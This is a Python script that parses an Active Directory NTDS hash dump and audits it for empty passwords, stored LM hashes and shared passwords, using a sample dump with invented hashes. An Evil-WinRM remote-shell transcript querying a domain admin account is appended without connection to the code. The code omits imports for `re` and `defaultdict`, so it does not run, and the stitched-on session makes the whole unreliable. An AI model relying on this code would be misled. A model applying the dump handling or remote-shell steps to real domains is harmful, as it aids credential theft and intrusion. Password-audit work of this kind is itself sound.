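from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample; the per-account hashes are invented.
SAMPLE_DUMP = """\
[+] Dumping the NTDS, this could take a while so go grab a redbull...
CORP\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:1f4a6093623653f6488d5aa24c75f2ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3ca378b063b18294fa5122c66c2280d4:::
svc_legacy:1120:e52cac67419a9a224a3b108f3fa6cb6d:0123456789abcdef0123456789abcdef:::
j.doe:1121:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
a.smith:1122:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
SMB         dc.corp.local   445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:a7864ab463177acb9aec553f18f42577:::
"""

# One hash record anywhere on the line; status lines simply do not match.
LINE = re.compile(
    r"(?P<user>[^\s:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def is_machine(self) -> bool:
        return self.user.endswith("$")


def parse_dump(text: str) -> list[Account]:
    """Extract every hash record from the dump, dropping any DOMAIN\\ prefix."""
    accounts = []
    for line in text.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        user = m["user"].split("\\")[-1]
        accounts.append(Account(user, int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts


def audit(accounts: list[Account]) -> dict[str, list[str]]:
    """Return findings keyed by category.

    empty_password:  NT hash equals the hash of the empty string
    lm_hash_stored:  an LM hash other than the 'disabled' constant is present
    shared_password: non-machine accounts whose NT hashes are identical
    """
    findings: dict[str, list[str]] = defaultdict(list)
    by_nt: dict[str, list[str]] = defaultdict(list)
    for a in accounts:
        if a.nt == EMPTY_NT:
            findings["empty_password"].append(a.user)
        if a.lm != EMPTY_LM:
            findings["lm_hash_stored"].append(a.user)
        if not a.is_machine:
            by_nt[a.nt].append(a.user)
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings["shared_password"].append(",".join(sorted(users)))
    return dict(findings)


if __name__ == "__main__":
    for category, users in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{category:<16} {users}")
```

Machine accounts are excluded from the password-reuse check because their passwords are random and never shared; a hit there would point at a parsing problem rather than a finding.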
```
*Evil-WinRM* PS C:\Users\winrm_user\Documents> net user administrator
User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/9/2022 1:25:57 AM
Password expires             Never
Password changeable          6/10/2022 1:25:57 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/31/2023 9:05:00 AM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *Domain Users         *Schema Admins
                             *Enterprise Admins    *Domain Admins
                             *Group Policy Creator
The command completed successfully.
```